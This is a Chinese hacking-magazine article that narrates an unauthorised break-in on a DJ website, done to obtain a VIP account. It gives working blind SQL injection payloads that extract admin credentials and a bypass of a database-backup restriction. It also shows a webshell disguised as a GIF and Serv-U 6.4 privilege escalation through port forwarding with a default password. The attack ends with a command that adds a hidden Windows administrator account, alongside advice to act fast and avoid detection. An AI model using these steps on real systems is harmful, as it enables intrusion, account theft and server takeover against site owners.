作者:Tommie(C.R.S.T)
已經(jīng)發(fā)表在黑客手冊(cè)2008年第三期.
or突破防注入
    春節(jié)呆在家里上網(wǎng)，我表哥突然找我說(shuō)要一個(gè)DJ網(wǎng)站的VIP會(huì)員，說(shuō)搞定后請(qǐng)我吃KFC，于是就答應(yīng)了。用IE打開目標(biāo)網(wǎng)站，找到一個(gè)帶參數(shù)的ASP鏈接。提交AND 1=1，如圖2。
可能到了這里，有些讀者會(huì)選擇放棄。其實(shí)，如果一個(gè)網(wǎng)站的防注入不是過(guò)濾得很嚴(yán)的話，可以試試or注入。向注入點(diǎn)提交or 1=1，發(fā)現(xiàn)跳到另外一個(gè)頁(yè)面了，如圖3。

然后or 1=2返回最原始的頁(yè)面了，如圖4。

由于or的特性，當(dāng)查詢條件為真的時(shí)候，返回是異常的，當(dāng)查詢條件為假的時(shí)候，返回是正常的。用如下語(yǔ)句：

/productsview2.asp?id=248 or exists(select * from admin) //判斷是否存在admin這個(gè)表，發(fā)現(xiàn)頁(yè)面返回正常，也就是圖4，說(shuō)明不存在admin這個(gè)表。
/productsview2.asp?id=248 or exists(select * from manage) //頁(yè)面返回異常了，也就是圖3，說(shuō)明存在manage這個(gè)表。猜完表后就要猜解字段了。
/productsview2.asp?id=248 or exists(select username from manage) //返回異常頁(yè)面了，說(shuō)明manage這個(gè)表中含有username這個(gè)字段，這時(shí)我們就可以猜數(shù)據(jù)了。
/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form manage)<123 //判斷manage表中username字段的第一條數(shù)據(jù)的第一個(gè)字符的ascii值是否小于123，提交后發(fā)現(xiàn)返回異常頁(yè)面。
/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form manage)>96 //提交后發(fā)現(xiàn)返回異常頁(yè)面，得到第一個(gè)字符的ascii值范圍在97-122之間，也就是在字母a-z之間，再慢慢縮小猜解的范圍直到猜解出來(lái)用牛族多功能ASCII轉(zhuǎn)換工具轉(zhuǎn)換一下就可以得到管理員用戶名的第一個(gè)字符了。需要猜解第二位的時(shí)候把上面語(yǔ)句改為mid(username,2,1)，第三位mid(username,3,1)……如此類推。經(jīng)過(guò)一番努力，得到username字段的第一條數(shù)據(jù)的ASCII值為97 100 109 105 110，轉(zhuǎn)換得出字符串為admin。猜解完用戶名還需要猜解密碼，先猜字符再猜數(shù)據(jù)。
html備份限制的突破
    用明小子跑了下后臺(tái)，如圖5。

用注入得到的用戶密碼登陸后臺(tái)，逛了一圈之后發(fā)現(xiàn)有備份數(shù)據(jù)庫(kù)的地方，如圖6。

不過(guò)有HTML限制，這個(gè)可以突破的。“查看”-“源文件”-“文件”-“另存為”，保存到本地。接著用文本格式打開它，找到“<form method="post" action="admin_data.asp?action=backdata&act=backup">”，把這里的action改為admin_data.asp這個(gè)文件的URL路徑：“http://www.xxx.com/admin/admin_data.asp?action=backdata&;act=backup”，再修改“<input type="text" size="25" value="/data/#ylmv_data.mdb" disabled><input type=hidden name=DBpath value="/data/#ylmv_data.mdb">”的第二個(gè)value值“/data/#ylmv_data.mdb”改為你需要備份的文件。可能有些讀者不明白為什么要這樣改，這里就要運(yùn)用到一些HTML知識(shí)了，如果不會(huì)的朋友可以把凡是涉及“/data/#ylmv_data.mdb”這個(gè)路徑（也就是當(dāng)前數(shù)據(jù)庫(kù)路徑）全部替換為你需要備份的文件。這種備份限制相信很多讀者都遇過(guò)，如果不知道突破的方法很可能又會(huì)放棄的了，所以在這里奉勸大家最好學(xué)學(xué)這方面的知識(shí)，跟著保存修改后的文件。但問(wèn)題又來(lái)了，在后臺(tái)找不到可以上傳文件的功能，這時(shí)可以到前臺(tái)看看能不能找到可以上傳的地方，這里的DJ網(wǎng)站能讓我們注冊(cè)會(huì)員（普通會(huì)員），于是我就注冊(cè)了一個(gè)會(huì)員，在控制面版里找到可以上傳頭像的地方，于是上傳了一個(gè)只是把后綴改為gif格式的一句話asp木馬，上傳后如圖7。

原來(lái)是判斷文件頭，這時(shí)我們可以借助ASP圖片木馬生成器這款軟件，先把一張比較小的圖片（經(jīng)過(guò)后來(lái)的測(cè)試發(fā)現(xiàn)除了判斷文件頭還判斷大?。┖鸵粋€(gè)asp一句話木馬放到這款軟件的目錄下，寫好名稱進(jìn)行生成，如圖8。

就會(huì)在所在目錄生成一個(gè)“aspmuma.gif”圖片木馬，把它上傳上去，如圖9。

把返回的相對(duì)路徑按照上面的方法替換好，打開后如圖10，

寫好備份后的路徑進(jìn)行備份，如圖11。

用lake2的eval最小馬發(fā)送端連接上去，如圖12。

Serv-U 6.4提權(quán)
    拿到WEBSHELL只要修改下數(shù)據(jù)庫(kù)就可以拿到VIP會(huì)員了，相信大家都會(huì)，以前的手冊(cè)也有介紹過(guò)。既然拿到SHELL，不提權(quán)怎對(duì)得起自己呢？先來(lái)看看這個(gè)虛擬主機(jī)是用什么FTP軟件搭建的。“開始”-“運(yùn)行”-“FTP www.xxx.com”，如圖13。

最近，6.4這個(gè)版本有人發(fā)布了提權(quán)asp出來(lái)，于是我下載回來(lái)進(jìn)行測(cè)試，發(fā)現(xiàn)無(wú)法成功提權(quán)，很多朋友都和我一樣覺(jué)得很郁悶。其實(shí)網(wǎng)上的ASP大多都是依賴XMLHTTP這個(gè)組件來(lái)訪問(wèn)本地的43958端口添加系統(tǒng)權(quán)限FTP用戶，那么我們不用XMLHTTP來(lái)替我們添加FTP用戶而是我們自己創(chuàng)造條件來(lái)訪問(wèn)43958端口又行不行呢？
    上傳一個(gè)被壓縮過(guò)的CMD.EXE（因?yàn)镮IS6.0默認(rèn)不讓上傳超過(guò)200KB的文件）和一個(gè)轉(zhuǎn)發(fā)工具：Fpipe.exe到“C:\Documents and Settings\All Users\Documents”這個(gè)目錄（這個(gè)目錄默認(rèn)是everyone權(quán)限），并且已經(jīng)在本地安裝好SERV-U。
在WEBSHELL執(zhí)行“"C:\Documents and Settings\All Users\Documents\FPipe.exe" -v -l 43959 -r 43958 127.0.0.1”，如圖14。

執(zhí)行之后IIS會(huì)處于假死現(xiàn)象，到了這時(shí)之后操作一定要迅速，不然被管理員發(fā)現(xiàn)網(wǎng)站訪問(wèn)速度慢了許多就麻煩了。打開SERV-U，右鍵新建一個(gè)服務(wù)器，如圖15。

第一步輸入目標(biāo)IP，第二步會(huì)提示要你輸入端口號(hào)，這時(shí)我們輸入轉(zhuǎn)發(fā)出來(lái)的端口43959，第三步輸入FTP服務(wù)器名稱，可以隨便輸入，第四步輸入默認(rèn)維護(hù)帳號(hào)“LocalAdministrator”，第五步輸入默認(rèn)密碼[email=“#l@$ak#.lk;0@P]“#l@$ak#.lk;0@P[/email]”，連接對(duì)方FTP服務(wù)器，如圖16，

發(fā)現(xiàn)已經(jīng)得到對(duì)方FTP服務(wù)器的管理權(quán)限！新建一個(gè)FTP用戶，在“帳戶”-“特權(quán)”那里選為“系統(tǒng)管理員”，在“目錄訪問(wèn)”那里把所有權(quán)限勾上，最后“應(yīng)用”，如圖17，18。

    “開始”-“運(yùn)行”-“FTP www.xxx.com”，輸入剛才新建FTP用戶和密碼，因?yàn)閷?duì)方開了3389，所以連接上后執(zhí)行“quote site exec net user Tommie nohack /add & net localgroup administrators Tommie /add”，返回“200 EXEC command successful”說(shuō)明成功添加了一個(gè)用戶是Tommie密碼為nohack的管理員，如圖19。

登陸3389，打開“任務(wù)管理器”-“進(jìn)程”，勾選“顯示所有用戶的進(jìn)程”，找到轉(zhuǎn)發(fā)工具的進(jìn)程Fpipe.exe結(jié)束之，如圖20，

使IIS再次恢復(fù)正常工作。
感想
    這次入侵讓我回想起Gene6的提權(quán)，雖然虛擬主機(jī)的目錄權(quán)限早已設(shè)置得死死的，但興幸的是Documents這樣的目錄并沒(méi)有被設(shè)置，而且Serv-U默認(rèn)只允許127.0.0.1（也就是本地，當(dāng)然，你也可以把Serv-U設(shè)置成0.0.0.0這樣，也就是無(wú)限制連接）訪問(wèn)43958端口，所以可以通過(guò)轉(zhuǎn)發(fā)來(lái)解決來(lái)這個(gè)問(wèn)題。經(jīng)過(guò)多個(gè)版本的測(cè)試，這個(gè)目錄無(wú)修改權(quán)限的提權(quán)方法是通殺所有版本的。前提服務(wù)器必須要支持WScript.Shell組件或支持執(zhí)行命令。最后文章有不清楚的朋友可以直接到黑客手冊(cè)論壇找我。論壇Id:Tommie。

最新評(píng)論